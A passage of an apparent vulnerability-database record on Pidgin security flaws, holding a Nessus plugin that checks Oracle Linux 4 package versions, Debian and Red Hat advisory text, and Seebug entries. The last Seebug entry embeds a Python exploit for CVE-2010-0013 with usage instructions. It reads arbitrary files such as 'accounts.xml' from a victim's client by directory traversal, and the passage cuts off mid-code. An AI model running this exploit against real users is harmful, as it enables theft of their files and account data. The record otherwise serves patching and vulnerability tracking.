RHSA-2010:0115 and \n# Oracle Linux Security Advisory ELSA-2010-0115 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68001);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\");\n script_bugtraq_id(38294);\n script_xref(name:\"RHSA\", value:\"2010:0115\");\n\n script_name(english:\"Oracle Linux 4 : pidgin (ELSA-2010-0115)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2010:0115 :\n\nUpdated pidgin packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could\nsend a specially crafted INVITE request that would cause a denial of\nservice (memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat\nimplementation, when using multi-user chat. If a Finch user in a\nmulti-user chat session were to change their nickname to contain the\nHTML 'br' element, it would cause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin\nproject for responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed\nemoticon images. A remote attacker could flood the victim with\nemoticon images during mutual communication, leading to excessive CPU\nuse. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages,\nwhich correct these issues. Pidgin must be restarted for this update\nto take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2010-February/001363.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"finch-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"finch-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-perl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-tcl-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-devel-2.6.6-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-perl-2.6.6-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2016-09-02T18:25:21", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ppc", "packageFilename": "pidgin_2.4.3-4lenny6_powerpc.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "libpurple-bin_2.4.3-4lenny6_all.deb", "packageName": "libpurple-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "x86-64", "packageFilename": "libpurple0_2.4.3-4lenny6_amd64.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ppc", "packageFilename": "libpurple0_2.4.3-4lenny6_powerpc.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ia64", "packageFilename": "libpurple0_2.4.3-4lenny6_ia64.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ppc", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_powerpc.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "hppa", "packageFilename": "pidgin_2.4.3-4lenny6_hppa.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "x86-64", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_amd64.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "finch-dev_2.4.3-4lenny6_all.deb", "packageName": "finch-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "s390x", "packageFilename": "libpurple0_2.4.3-4lenny6_s390.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "alpha", "packageFilename": "pidgin_2.4.3-4lenny6_alpha.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "arm", "packageFilename": "libpurple0_2.4.3-4lenny6_arm.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "i686", "packageFilename": "pidgin_2.4.3-4lenny6_i386.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "armel", "packageFilename": "libpurple0_2.4.3-4lenny6_armel.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "alpha", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_alpha.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mips", "packageFilename": "libpurple0_2.4.3-4lenny6_mips.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "alpha", "packageFilename": "finch_2.4.3-4lenny6_alpha.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "alpha", "packageFilename": "libpurple0_2.4.3-4lenny6_alpha.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "libpurple-dev_2.4.3-4lenny6_all.deb", "packageName": "libpurple-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6.diff", "arch": "src", "packageFilename": "pidgin_2.4.3-4lenny6.diff.gz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "src", "packageFilename": "pidgin_2.4.3-4lenny6.dsc", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "arm", "packageFilename": "pidgin_2.4.3-4lenny6_arm.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mipsel", "packageFilename": "libpurple0_2.4.3-4lenny6_mipsel.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "arm", "packageFilename": "finch_2.4.3-4lenny6_arm.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "sparc", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_sparc.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ia64", "packageFilename": "finch_2.4.3-4lenny6_ia64.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "s390x", "packageFilename": "pidgin_2.4.3-4lenny6_s390.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "sparc", "packageFilename": "libpurple0_2.4.3-4lenny6_sparc.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mipsel", "packageFilename": "pidgin_2.4.3-4lenny6_mipsel.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3.orig", "arch": "src", "packageFilename": "pidgin_2.4.3.orig.tar.gz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "sparc", "packageFilename": "finch_2.4.3-4lenny6_sparc.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "i686", "packageFilename": "finch_2.4.3-4lenny6_i386.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "armel", "packageFilename": "pidgin_2.4.3-4lenny6_armel.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "pidgin-data_2.4.3-4lenny6_all.deb", "packageName": "pidgin-data", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ia64", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_ia64.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "i686", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_i386.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mips", "packageFilename": "pidgin_2.4.3-4lenny6_mips.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "x86-64", "packageFilename": "pidgin_2.4.3-4lenny6_amd64.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mips", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_mips.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "s390x", "packageFilename": "finch_2.4.3-4lenny6_s390.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "hppa", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_hppa.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "hppa", "packageFilename": "finch_2.4.3-4lenny6_hppa.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mips", "packageFilename": "finch_2.4.3-4lenny6_mips.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mipsel", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_mipsel.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "mipsel", "packageFilename": "finch_2.4.3-4lenny6_mipsel.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "pidgin-dev_2.4.3-4lenny6_all.deb", "packageName": "pidgin-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "x86-64", "packageFilename": "finch_2.4.3-4lenny6_amd64.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "armel", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_armel.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "arm", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_arm.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ia64", "packageFilename": "pidgin_2.4.3-4lenny6_ia64.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "i686", "packageFilename": "libpurple0_2.4.3-4lenny6_i386.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "ppc", "packageFilename": "finch_2.4.3-4lenny6_powerpc.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "hppa", "packageFilename": "libpurple0_2.4.3-4lenny6_hppa.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "armel", "packageFilename": "finch_2.4.3-4lenny6_armel.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "s390x", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_s390.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "sparc", "packageFilename": "pidgin_2.4.3-4lenny6_sparc.deb", "packageName": "pidgin", "operator": "lt"}], "description": "Several remote vulnerabilities have been discovered in Pidgin, a multi protocol instant messaging client. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2010-0420](<https://security-tracker.debian.org/tracker/CVE-2010-0420>)\n\nCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\n * [CVE-2010-0423](<https://security-tracker.debian.org/tracker/CVE-2010-0423>)\n\nRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft's servers for MSN have changed the protocol, making Pidgin non-functional for use with MSN. It is not feasible to port these changes to the version of Pidgin in Debian Lenny. This update formalises that situation by disabling the protocol in the client. Users of the MSN protocol are advised to use the version of Pidgin in the repositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in version 2.4.3-4lenny6.\n\nFor the unstable distribution (sid), these problems have been fixed in version 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.", "edition": 1, "reporter": "Debian", "published": "2010-04-18T00:00:00", "title": "pidgin -- several vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2010-04-18T00:00:00", "id": "DSA-2038", "href": "http://www.debian.org/security/dsa-2038", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:13:59", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 38294\r\nCVE ID: CVE-2010-0277,CVE-2010-0420,CVE-2010-0423\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002\r\n\r\nPidgin\u7684MSN\u534f\u8bae\u5b9e\u73b0\u5904\u7406MSNSLP\u9080\u8bf7\u7684\u65b9\u5f0f\u5b58\u5728\u8f93\u5165\u8fc7\u6ee4\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u53d1\u9001\u7279\u5236\u7684INVITE\u8bf7\u6c42\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\uff08\u5185\u5b58\u7834\u574f\u548c Pidgin\u5d29\u6e83\uff09\u3002\r\n\r\nFinch\u7684XMPP\u804a\u5929\u5b9e\u73b0\u5728\u4f7f\u7528\u591a\u7528\u6237\u4f1a\u8bdd\u65f6\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u3002\u5982\u679c\u591a\u7528\u6237\u804a\u5929\u4f1a\u8bdd\u4e2d\u7684Finch\u7528\u6237\u8981\u5c06\u6635\u79f0\u66f4\u6539\u4e3a\u5305\u542b\u6709HTML br\u5143\u7d20\uff0c\u5c31\u4f1a\u5bfc\u81f4Finch\u5d29\u6e83\u3002\r\n\r\nPidgin\u5904\u7406\u8868\u60c5\u7b26\u56fe\u5f62\u7684\u65b9\u5f0f\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u76f8\u4e92\u901a\u8baf\u4e2d\u5411\u53d7\u5bb3\u7528\u6237\u53d1\u9001\u5927\u91cf\u7684\u8868\u60c5\u7b26\u56fe\u5f62\uff0c\u5bfc\u81f4\u8fc7\u591a\u7684CPU\u4f7f\u7528\u7387\u3002\n\nPidgin &lt; 2.6.6\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2010:0115-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2010:0115-01\uff1aModerate: pidgin security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2010-0115.html\r\n\r\nPidgin\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://developer.pidgin.im/wiki/ChangeLog", "reporter": "Root", "published": "2010-03-02T00:00:00", "title": "Pidgin\u591a\u4e2a\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0277", "CVE-2010-0420", "CVE-2010-0423"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-03-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19202", "id": "SSV:19202", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T12:19:02", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Pidgin MSN <= 2.6.4 File Download Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0013"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67539", "id": "SSV:67539", "sourceData": "\n #!/usr/bin/env python \r\n&#34;&#34;&#34;\r\nPidgin MSN &#60;= 2.6.4 file download vulnerability\r\n\r\n19 January 2010\r\n\r\nMathieu GASPARD (gaspmat@gmail.com)\r\n\r\n\r\nDescription:\r\n\t\tPidgin is a multi-protocol Instant Messenger.\r\n\r\n\t\tThis is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.\r\n\t\tThe issue is caused by an error in the MSN custom smiley feature when processing emoticon requests, \r\n\t\twhich could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.\r\n\r\nAffected versions :\r\n\t\tPidgin &#60;= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n\t\tPlugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date\r\n\r\nPlateforms :\r\n\t\tWindows, Linux, Mac\r\n\r\nFix :\r\n\t\tFixed in Pidgin 2.6.5\r\n\t\tUpdate to the latest version : http://www.pidgin.im/download/\r\n\r\nReferences :\r\n\t\t[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\r\n\t\t[2] http://www.pidgin.im/news/security/?id=42\r\n\r\nUsage :\r\n\t\tYou need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn\r\n\t\tpython pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]\r\n\r\nExample : \r\n# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPidgin MSN file download vulnerability (CVE-2010-0013)\r\n\r\n\t\tUsage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPlease enter the password for the account &#34;foo@hotmail.com&#34;\r\n\t\tPassword:\r\n\t\t[+] Connecting to server\r\n\t\t[+] Authentication in progress\r\n\t\t[+] Synchronisation in progress\r\n\t\t[+] OK, all done, ready to proceed\r\n\t\t[+] Sending request for file &#34;../accounts.xml&#34; to &#34;victim@hotmail.com&#34;\r\n\t\t[+] Using session_id 974948028\r\n\t\tCurrent : 3606, total: 3881 (92%)\r\n\t\t[+] Got an answer from the contact\r\n\t\t----------------\r\n\t\t&#60;?xml version=&#39;1.0&#39; encoding=&#39;UTF-8&#39; ?&#62;\r\n\r\n\t\t&#60;account version=&#39;1.0&#39;&#62;\r\n\t\t........\r\n&#34;&#34;&#34;\r\n\r\n\r\nimport warnings\r\nwarnings.simplefilter(&#34;ignore&#34;,DeprecationWarning)\r\nimport os\r\nimport sys\r\ntry:\r\n\timport pymsn\r\nexcept ImportError:\r\n\tprint &#34;Pymsn couldn&#39;t be loaded&#34;\r\n\tprint &#34;On debian-like systems, the package is python-msn&#34;\r\n\tsys.exit(-1)\r\nimport gobject\r\nimport logging\r\nimport getpass\r\nimport hashlib\r\nfrom optparse import OptionParser\r\nimport signal\r\nimport time\r\n\r\nSERVER_ADDRESS = &#39;messenger.hotmail.com&#39;\r\nSERVER_PORT = 1863\r\nFD_OUT = sys.stdout\r\nMAINLOOP = None\r\n# seconds after which, if we didn&#39;t get an answer, we quit\r\nTIMEOUT = 5\r\n\r\nglobal_client = None\r\n\r\ndef quit():\r\n\tMAINLOOP.quit()\r\n\tsys.exit(0)\r\n\t\r\n\r\ndef check_if_succeeds():\r\n\t# if False, we didn&#39;t get a chunk so we won&#39;t get any file, so we quit\r\n\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\tprint &#34;[+] Didn&#39;t get an answer from the client after %d seconds, it&#39;s likely not vulnerable or the file requested doesn&#39;t exist/is not accessible&#34;%TIMEOUT\r\n\t\tprint &#34;[+] Exiting&#34;\r\n\t\tglobal_client.quit()\r\n\r\n# called when we get the result data, after our request\r\ndef handle_answer(object, client):\r\n\tprint &#34;\\n[+] Got an answer from the contact&#34;\r\n\td = object._data\r\n\tdata = d.read()\r\n\tlength = len(data)\r\n\tFD_OUT.write(data)\r\n\t# if we wrote output to stdout, don&#39;t close it\r\n\tif FD_OUT != sys.stdout:\r\n\t\tFD_OUT.close()\r\n\t\tprint &#34;[+] Wrote %d bytes to file&#34;%length\r\n\tclient.end = time.time()\r\n\tduration = client.end - client.begin\r\n\tprint &#34;[+] Download lasted %d seconds at %d bytes/s &#34;%(duration,(length/duration))\r\n\tclient.quit()\r\n\r\ndef my_on_chunk_recv(transport, chunk):\r\n\tglobal_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)\r\n\tsession_id = chunk.header.session_id\r\n\tblob_id = chunk.header.blob_id\r\n\tif session_id == 